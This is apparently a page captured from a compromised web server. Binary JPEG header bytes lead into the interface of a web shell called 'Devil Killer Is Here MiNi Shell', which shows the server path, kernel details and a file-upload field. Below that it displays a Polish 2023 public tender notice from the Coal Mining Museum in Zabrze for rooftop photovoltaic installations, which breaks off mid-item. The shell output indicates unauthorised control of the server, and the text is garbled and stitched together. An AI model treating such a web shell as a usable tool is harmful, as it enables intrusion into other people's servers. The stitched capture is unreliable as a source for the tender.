JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230316/0013971101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Wykonanie instalacji fotowoltaicznych na budynkach Muzeum Górnictwa Węglowego w Zabrzu:<br/>Zadanie 1. Ul. Georgiusa Agricoli 2<br/>Zadanie 2. Ul. Wolności 410<br/>Zadanie 3. Ul Mochnackiego 2 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MUZEUM GÓRNICTWA WĘGLOWEGO W ZABRZU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 243220420</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Georgiusa Agricoli 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zabrze</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-800</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 630 30 91</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@muzeumgornictwa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.muzeumgornictwa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie instalacji fotowoltaicznych na budynkach Muzeum Górnictwa Węglowego w Zabrzu:<br/>Zadanie 1. Ul. Georgiusa Agricoli 2<br/>Zadanie 2. Ul. Wolności 410<br/>Zadanie 3. Ul Mochnackiego 2 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e25c4c94-c282-11ed-b311-9aae6ad31be8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00139711</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00072818/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.13 Wykonanie instalacji fotowoltaicznych na budynkach Muzeum Górnictwa Węglowego w Zabrzu.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zadane realizowane w ramach projektu „Wykonanie instalacji fotowoltaicznych na budynkach Muzeum Górnictwa Węglowego w Zabrzu” współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Województwa Śląskiego na lata 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://muzeumgornictwa.eb2b.com.pl/ lub https://platforma.eb2b.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Postępowanie prowadzone jest w języku polskim.<br/>2.	Komunikacja między zamawiającym a wykonawcami odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej zgodnie z art. 61 ustawy, za pośrednictwem elektronicznej platformy zakupowej pod adresem: https://platforma.eb2b.com.pl lub https://xx.eb2b.com.pl, która spełnia wymagania opisane w art. 64 ustawy.<br/>3.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na Platformie Zakupowej. Zarejestrowanie i utrzymywanie konta na Platformie Zakupowej oraz korzystanie z Platformy jest bezpłatne.<br/>4.	Wymagania techniczne i organizacyjne korzystania z Platformy Zakupowej określa Regulamin Platformy Zakupowej. <br/>5.Link do postępowania: https://muzeumgornictwa.eb2b.com.pl/ lub https://platforma.eb2b.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">. Instrukcja korzystania z Platformy:<br/>a) w zakładce „Postępowania”, dalej „Lista postępowań otwartych” wykonawca wybiera niniejsze postępowanie oraz korzystając z<br/>polecenia „Zgłoś się do udziału w postępowaniu” przechodzi odpowiednio do Formularza rejestracyjnego – w przypadku, kiedy<br/>wykonawca nie posiada konta na Platformie, lub panelu logowania użytkownika do Systemu w przypadku posiadania konta na<br/>Platformie;<br/>b) w zakładce „Załączniki” przedmiotowego postępowania dostępna jest dokumentacja postępowania . Pobranie dokumentu<br/>następuje po kliknięciu na wybrany załącznik i wciśnięciu polecenia „Pobierz”. W celu pobrania wszystkich załączników jednocześnie<br/>należy wybrać polecenie „Pobierz paczkę”, a następnie „Pobierz wszystkie załączniki organizatora”.<br/>2. Niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę: a. stały dostęp do sieci Internet o gwarantowanej<br/>przepustowości nie mniejszej niż 4/1 mb/s,b. komputer klasy PC lub lub Mac, o następującej konfiguracji: pamięć RAM min. 8 GB,<br/>procesor Intel IV 4GHz, jeden z systemów operacyjnych: MS Windows 7, Mac OS x 10.4, Linux, lub ich nowsze wersje, c.<br/>zainstalowana dowolna najnowsza wersja przeglądarki internetowej; w przypadku Internet Explorer minimalnie wersja<br/>11.0.d.włączona obsługa JavaScript,e. zainstalowany program obsługujący stosowane przez wykonawcę formaty plików (np.<br/>Acrobat Reader dla plików w formacie .pdf).<br/>3. Wszelkie dokumenty, oświadczenia, informacje, o których mowa w SWZ, należy wczytać jako załączniki na Platformie, według<br/>Instrukcji korzystania z Platformy, dostępnej dla zalogowanych użytkowników w zakładce „Pomoc” – „Instrukcje”. Zamawiający<br/>zaleca wczytywanie na Platformę plików w maksymalnym rozmiarze do 100 MB. Dokumenty elektroniczne, oświadczenia lub<br/>elektroniczne kopie dokumentów lub oświadczeń składające się na ofertę, składane są przez wykonawcę przy użyciu zakładki<br/>„Załączniki” w trakcie etapu składania ofert/wniosków. Dokumenty elektroniczne, oświadczenia, uzupełnienia, elektroniczne kopie<br/>dokumentów lub oświadczeń składane przez wykonawcę po złożeniu ofert, składane są przy użyciu zakładki „Pytania/informacje”<br/>.Ewentualne wnioski o wyjaśnienie treści SWZ, wnioski o przeprowadzenie wizji lokalnej itp., także składane są przy użyciu zakładki<br/>„Pytania/informacje”.<br/>4. Zamawiający dopuszcza przesyłanie plików w formatach określonych w przepisach wydanych na podstawie art. 18ustawy z<br/>dnia17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (t.j. Dz. U. z 2017 r. poz.570 z późn.<br/>zm.),tj. rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych<br/>wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów<br/>teleinformatycznych (t.j. Dz. U. z 2017 r. poz. 2247) – w szczególności w formatach: .pdf, .doc, .docx, .rtf lub .odt., xades.<br/>5. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip lub .7Z.<br/>6. Wśród formatów powszechnych a nie występujących w rozporządzeniu występują: .rar, .gif, .bmp, .numbers, .pages. Dokumenty<br/>złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>7. Zamawiający dopuszcza przesyłanie dokumentów (w tym oferty) skompresowanych formatem .rar. Przesłanie pliku jest możliwe<br/>tylko po uprzednim jego skompresowaniu do innego formatu wskazanego w Rozporządzeniu, o którym mowa w ust. 7 (np. .zip).<br/>8. Ofertę, oświadczenie, o których mowa w art. 125 ust. 1 ustawy Pzp należy złożyć pod rygorem nieważności w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>9. Podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp, przedmiotowe środki<br/>dowodowe, niewystawione przez upoważnione podmioty, oraz pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje się<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Klauzula informacyjna: Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:- administratorem Pani/Pana danych osobowych jest Muzeum Górnictwa Węglowego w Zabrzu, ul. Georgiusa Agricoli 2, 41-800 Zabrze; kontakt: biuro@muzeumgornictwa.pl- kontakt do inspektora ochrony danych: iod@muzeumgornictwa.pl- Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu przeprowadzenia niniejszego postępowania o udzielenie zamówienia publicznego - odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty prawnie do tego upoważnione- Pani/Pana dane osobowe będą przechowywane przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy- obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp- w odniesieniu do Pani/Pana danych osobowych – stosownie do art. 22 RODO - decyzje nie będą podejmowane w sposób zautomatyzowany2. Obowiązek informacyjny Wykonawcy z zakresu ochrony danych osobowych:- Obowiązkiem Wykonawcy jest wypełnienie obowiązku informacyjnego, przewidzianego w art. 13 lub art. 14 RODO, wobec osób fizycznych lub osób fizycznych, prowadzących jednoosobową działalność gospodarczą lub pełnomocników będących osobami fizycznymi lub członków organów zarządzających będących osobami fizycznymi, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym postępowaniu. W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem wykonawcy w postępowaniu, Zamawiający prosi o złożenie oświadczenia w tym zakresie .</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">2. RODO (ograniczenia stosowania): posiada Pani/Pan:− na podstawie art. 15 RODO, prawo dostępu do danych osobowych Pani/Pana dotyczących− na podstawie art. 16 RODO, prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników)- na podstawie art. 18 RODO, prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO(prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego)− na podstawie art. 13 ust. 2 pkt. d RODO prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;- nie przysługuje Pani/Panu:- w związku z art. 17 ust. 3 lit. b, d lub e RODO, prawo do usunięcia danych osobowych− w związku z art. 20 ust.1 lit. a, prawo do przenoszenia danych osobowych− na podstawie art. 21 RODO, prawo sprzeciwu, wobec przetwarzania danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/13/MGW/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 1:<br/>1. Przedmiot zamówienia obejmuje wykonanie instalacji fotowoltaicznej na obiekcie: <br/>- Budynek dyrekcji MGW ul. Georgiusa Agricoli 2, 41-800 Zabrze.<br/> <br/>2. Stan obecny: budynek 3 kondygnacyjny murowany, dach skośny pokryty papą. Nie posiada obecnie instalacji fotowoltaicznej. Podłączenie do sieci elektroenergetycznej TAURON o napięciu 400 V za pomocą złącza kablowo-pomiarowego zlokalizowanego na zewnątrz budynku. Obiekt posiada rozdzielnicę główną oraz pod rozdzielnice piętrowe. Obiekt posiada wyłącznik p-poż, oraz sprawną instalacje uziomową. <br/><br/>3. W zakresie przedmiotu zamówienia jest:<br/>a.	dostawa i montaż inwertera o mocy 30 kW<br/>b.	instalacja elektryczna po stronie DC<br/>c.	instalacja elektryczna po stronie AC<br/>d.	instalacja wyłącznika p-poż wraz wpięciem w ustający układ wyłącznika p-poż<br/>e.	instalacja odgromowa w zakresie niezbędnym dla potrzeb instalacji PV<br/>f.	dostawa i montaż 44 paneli fotowoltaicznych (wraz z konstrukcją) o mocy min 0,4 kW/ panel o sumarycznej mocy min. 17,6 kW<br/>g. wykonanie dokumentacji powykonawczej (w 3-ch egzemplarzach) zawierającej dokumentację z naniesionymi w trakcie budowy zmianami, komplet protokołów prób i pomiarów, karty zatwierdzenia materiałów.<br/><br/>Wykonawca powinien tak zorganizować dostawę i montaż instalacji fotowoltaicznej, aby umożliwić normalne korzystanie z obiektu.<br/><br/>Szczegółowy opis przedmiotu zamówienia stanowi dokumentacja techniczna – załącznik nr 5/1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09331200-0 - Słoneczne moduły fotoelektryczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09332000-5 - Instalacje słoneczne</p> <p class="mb-0">31712331-9 - Fotoogniwa</p> <p class="mb-0">71314100-3 - Usługi elektryczne</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45312311-0 - Montaż instalacji piorunochronnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający w ramach zamówienia na Zadanie 1 przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 441 ustawy.<br/>1)	Zamówienie do udzielenia w ramach prawa opcji, polegać będzie na dostawie i montażu dodatkowych 31 paneli fotowoltaicznych wraz konstrukcją o mocy min 0,4 kW/panel o sumarycznej mocy min. 12,4 kW (identycznych jak zaproponowane w zakresie podstawowym) – zgodnie z opisem zawartym w załączniku nr 5/1 do SWZ).<br/>2)	Wartość zamówienia przewidzianego do udzielenia w ramach prawa opcji wyniesie [zgodnie z ofertą] zł. <br/>3)	Przystąpienie do realizacji zamówienia w części dotyczącej zakresu objętego prawem opcji uzależnione jest od decyzji Zamawiającego podjętej na zasadach i terminach wskazanych w projektowanych postanowieniach umowy. <br/>4)	Zastrzega się, iż prawo opcji (zakres opcjonalny zamówienia) nie stanowi zobowiązania umownego (w tym finansowego) zaciąganego w momencie zawarcia umowy a przewidywany zakres opcjonalny zamówienia nie jest gwarantowany do realizacji. <br/>Jednakże, w przypadku skorzystania z prawa opcji, Zamawiający zrealizuje zakres zamówienia opcjonalnego w całości. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W ramach kryterium „Cena oferty”(oznaczonego jako „C” ) Zamawiający przyzna maksymalnie 100 pkt. Oferty w tym kryterium będą oceniane w dwóch podkryteriach:<br/>a)	Podkryterium nr 1 – cena brutto dla zakresu podstawowego zamówienia (oznaczone jako „CP”). W ramach podkryterium „CP” oferta z najniższą ceną brutto dla zakresu podstawowego zamówienia uzyska 83 pkt . Pozostałe oferty otrzymają punkty w tym podkryterium w ilości proporcjonalnie mniejszej,<br/>wyliczonej według wzoru:<br/><br/> CNP<br/>CP = ----------- x 83<br/> CBP<br/>gdzie: <br/>CP – liczba punktów Cena za zakres podstawowy,<br/>CNP – najniższa zaoferowana cena dla zakresu podstawowego,<br/>CBP – cena oferty badanej dla zakresu podstawowego.<br/><br/>b) Podkryterium nr 2 – cena brutto dla zakresu objętego prawem opcji w zakresie przewidzianym przez Zamawiającego w pkt.1.1.4 Rozdziału II SWZ („CO”). W ramach podkryterium „CO” oferta z najniższą ceną brutto dla zakresu objętego prawem opcji uzyska 17 pkt. Pozostałe oferty otrzymają punkty w tym podkryterium w ilości proporcjonalnie mniejszej, wyliczonej według wzoru:<br/><br/> CNO<br/>CO = ----------- x 17 <br/> CBO<br/>gdzie: <br/>CO – liczba punktów Cena za zakres objęty prawem opcji <br/>CNO – najniższa zaoferowana cena dla zakresu objętego prawem opcji,<br/>CBO – cena oferty badanej dla zakresu objętego prawem opcji.<br/><br/>c)	Po ocenie ofert w ramach przewidzianych podkryteriów opisanych wskaźnikami: „CP” i „CO”, o których mowa powyżej, poszczególne oferty otrzymują sumę punktów przyznaną w ramach kryterium „cena oferty”, zgodnie ze wzorem:<br/>C = CP + CO<br/>d) Punkty w podkryteriach opisanych wskaźnikami „CP” i „CO” zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>e) Za ofertę najkorzystniejszą będzie uznana oferta, która nie podlega odrzuceniu i otrzyma najwyższą punktację.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 2:<br/>1. Przedmiot zamówienia obejmuje wykonanie instalacji fotowoltaicznej na obiekcie: <br/>- Budynek Łaźni Łańcuszkowej ul. Wolności 410, 41-800 Zabrze.<br/><br/>2. Stan obecny: budynek jednokondygnacyjny, murowany, dach dwuspadowy ze świetlikiem, pokryty papą. Obiekt posiada sprawną instalacje odgromową i uziomową. Zasianie obiektu w energię elektryczną odbywa się za pomocą złącza kablowo-pomiarowego z dwoma niezależnymi licznikami energii elektrycznej dla zasilania:<br/>a.	obszaru restauracji (1/3 budynku) posiadającego własną rozdzielnic oraz osobny licznik energii elektrycznej;<br/>b.	obszar kas biletowych i wystawy (2/3 budynku) posiadających własną rozdzielnice główną osobny licznik energii elektrycznej. Do rozdzielnicy głównej podłączony jest agregat prądotwórczy kogeneracyjny o mocy 15 kW. Obiekt posiada wyłącznik P-poż wyłączający napięcie na całym obiekcie.<br/><br/>3. W zakresie przedmiotu zamówienia jest:<br/>a.	dostawa i montaż inwertera o mocy 5 kW <br/>b.	dostawa i montaż okablowania pod stronie DC<br/>c.	dostawa montaż okablowania po stronie AC<br/>d.	wyłącznik P-poz instalacji 